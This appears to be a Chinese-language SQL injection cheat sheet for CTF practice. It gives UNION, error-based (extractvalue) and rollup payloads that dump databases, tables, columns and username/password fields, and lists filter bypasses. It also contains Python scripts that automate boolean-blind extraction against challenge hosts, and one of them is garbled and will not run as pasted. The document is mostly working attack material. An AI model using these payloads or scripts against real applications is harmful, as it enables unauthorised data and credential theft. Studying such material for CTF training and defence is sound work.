# MYSQL

mysql基础语句
  • 测试多少列
1' order by 4#
  • 爆库
-1' union select 1,database(),3#
  • 爆表
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
  • 爆字段
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
  • 爆字段值
-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#

# 字符型注入

#变 --+

  • 测试多少列
1' order by 4--+
  • 爆库
=1' union select 1,database(),3--+
  • 爆表
=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
  • 爆字段
=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'--+
  • 爆字段值
=-1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1--+

+++

# 空格绕过

/**/
()
`
tap
两个空格
%0a

# = 绕过

like

# 盲注

import requests
 
# Query prefix; each probe expression below is appended to it per request.
url = 'http://53aab0c2-b451-4910-a1e0-f15fd9e64b2a.challenge.ctf.show:8080/index.php?id=-1/**/or/**/'
# Accumulates the recovered string, one character per outer iteration.
name = ''
 
# Linear-scan boolean blind extraction. range(1, 45) yields positions 1..44;
# the author sized the bound by hand to the expected result length.
for i in range(1, 45):
    # Earlier probes kept for reference (commented out):
    # name of the current database
    # payload = 'ascii(substr(database()from/**/%d/**/for/**/1))=%d'
    # all table names in the current database
    # payload = 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%d/**/for/**/1))=%d'
    # column names of the flag table
    # payload = 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%d/**/for/**/1))=%d'
    # contents of the flag table
    payload = 'ascii(substr((select/**/flag/**/from/**/flag)from/**/%d/**/for/**/1))=%d'
    # Number of code points rejected at this position.
    count = 0
    print('正在获取第 %d 个字符' % i)
    # Try every code point 31..127 for position i; the substring 'If' in the
    # response body is the truth oracle.  Worst case this is 97 requests per
    # character, a request volume and near-identical-URL pattern that server
    # logs and rate-based alerting can pick up.
    for j in range(31, 128):
        result = requests.get(url + payload % (i, j))
 
        if 'If' in result.text:
            name += chr(j)
            print('数据库名/表名/字段名/数据: %s' % name)
            break
 
        # No code point matched at this position: treat it as the end of the
        # string and stop the whole script (128 - 31 == len(range(31, 128))).
        count += 1
        if count >= (128 - 31):
            exit()

# 二分法

import requests
# NOTE(review): the angle brackets around the URL look like markdown autolink
# garbling of the original string literal; as written this line does not parse.
url = '<http://1.14.97.218:22233/search.php?'>
# Accumulates the recovered string, one character per outer iteration.
flag = ''
# Binary-search variant of the boolean blind technique: about 7 requests per
# character over ASCII 32..127 instead of a linear scan.  Positions 140..199
# presumably resume an earlier partial run -- confirm against the original.
# NOTE(review): indentation below is inconsistent (the while/if/else/print
# lines sit at one space), so this block will not run as pasted.
for i in range(140, 200):
    left = 32
    right = 127
    mid = (left + right) // 2
 while left < right:
 # payload = 'id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{},1))>{})^1&search=%E6%9F%A5%E8%AF%A2'.format(i, mid)
 # payload = 'id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\\'emails\\')),{},1))>{})^1&search=%E6%9F%A5%E8%AF%A2'.format(i, mid)
        payload = 'id=1^(ascii(substr((select(group_concat(email_id))from(emails)),{},1))>{})^1&search=%E6%9F%A5%E8%AF%A2'.format(i, mid)
        r = requests.get(url+payload)
 # 'Dumb' in the body is the oracle for "character > mid": move the lower
 # bound up; otherwise mid is an upper bound.  Loop ends when left == right.
 if 'Dumb' in r.text:
            left = mid + 1
 else:
            right = mid
        mid = (left + right) // 2
    flag += chr(mid)
 print(flag)

# 例题

# [CISCN 2019 华北 Day2] Web1

1 和 2 有回显

# IF (expr,1,2)		# 如果表达式 expr 结果为 True 返回 1,否则返回 2;
id=if(length((select(database())))>0,1,2)
# 回显 Hello, glzjin wants a girlfriend.
id=if(length((select(database())))<0,1,2)
# 回显 Do you want to be my girlfriend?
#!/usr/bin/env  python3
# -*- encoding: UTF-8 -*-
import requests
import string
import time
class Sqlinject():
    """Boolean-based blind extraction driven by an HTTP POST oracle.

    The target is assumed to include ``keyword`` in its response body exactly
    when the injected condition is true; both methods use that substring test
    as their only signal.  The local names ``len``, ``min`` and ``max`` shadow
    Python builtins throughout this class.

    NOTE(review): ``keyword`` defaults to None, and ``None in req.text`` raises
    TypeError, so callers must always supply it.
    """
    def __init__(self, url, keyword=None, len=127):
        # Upper bound for the length search (not the builtin len).
        self._len = len
        self._url = url
        self._keyword = keyword
        # Set by getlength(); getflag() iterates 1..self._length, so calling
        # getflag() first does nothing.
        self._length = 0
        self._flag = ''
    # Brute-force the length: POST `payload % n` for n in 0..len-1 and stop at
    # the first response containing the keyword.  `name` is only a print label.
    def getlength(self, name, payload=None):
        self._payload = payload
        for len in range(self._len):
            payload = self._payload % len
            req = requests.post(self._url, data={'id': payload})
            if self._keyword in req.text:
                self._length = len
                print('%s_Length = %d.' % (name, self._length))
                break
    # Recover each character by binary search over ASCII 33..126.  The payload
    # is formatted with (position, threshold) and is expected to be true when
    # the character is >= threshold (see the `min = mid` branch).
    def getflag(self, payload=None):
        self._payload = payload
        for len in range(1, self._length + 1):
            min = 33
            max = 126
            while (max > min):
                # Upper midpoint so that `min = mid` always makes progress.
                mid = int((min + max + 1) / 2)
                payload = self._payload % (len, mid)
                req = requests.post(self._url, data={'id': payload})
                if self._keyword in req.text:
                    min = mid
                else:
                    max = mid - 1
                # Fixed 100 ms pacing between probes; this regular cadence of
                # near-identical POSTs is itself a detectable pattern in logs.
                time.sleep(0.1)
            # min == max here; the converged value is the character.
            self._flag += chr(max)
            print('flag:%s' % self._flag)
if __name__ == '__main__':
    urls = 'http://1.14.71.254:28890/index.php'
    # Response text that marks the injected condition as true.
    keywords = 'Hello, glzjin wants a girlfriend.'
    # Unused: built but never passed anywhere (string.printable already
    # contains the letters and digits).
    strs = string.ascii_letters + string.digits + string.printable
    inject = Sqlinject(urls, keywords)
    # getlength(name, payload) takes two arguments: `name` is an arbitrary label
    # for the position being brute-forced, used only in the printed output;
    # `payload` is a format string wrapped in double quotes with one %d (the
    # candidate length).  Apart from getlength, the other method needs only the
    # payload, whose two %d slots are the positions to be varied.
    inject.getlength("flaglen", "if(length((select(flag)from(flag)))=%d,1,0)")
    inject.getflag("if((ascii(substr((select(flag)from(flag)),%d,1)))>=%d,1,0)")

# rollup

admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup/**/#

# 报错注入

extractvalue()

# 例题

# [SWPUCTF 2021 新生赛] error

  • 爆库
1' and extractvalue(1,concat(0x7e,database())) #
  • 爆表数
1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema=database()))) #
  • 爆表名
id=1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) #
  • 爆字段
1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='test_tb' limit 0,1))) #
  • 爆字段值
1' and extractvalue(1,concat(0x7e,(select flag from test_tb)))#

NSSCTF{b4514a59-97bf-49a6-b899-

1' and extractvalue(1,concat(0x7e,substr((select flag from test_tb),30,30),0x7e))%23

9-efbf019869a5}

1' and extractvalue(1,concat(0x7e,substr((select flag from test_tb),1,33),0x7e))%23

NSSCTF{b4514a59-97bf-49a6-b899-
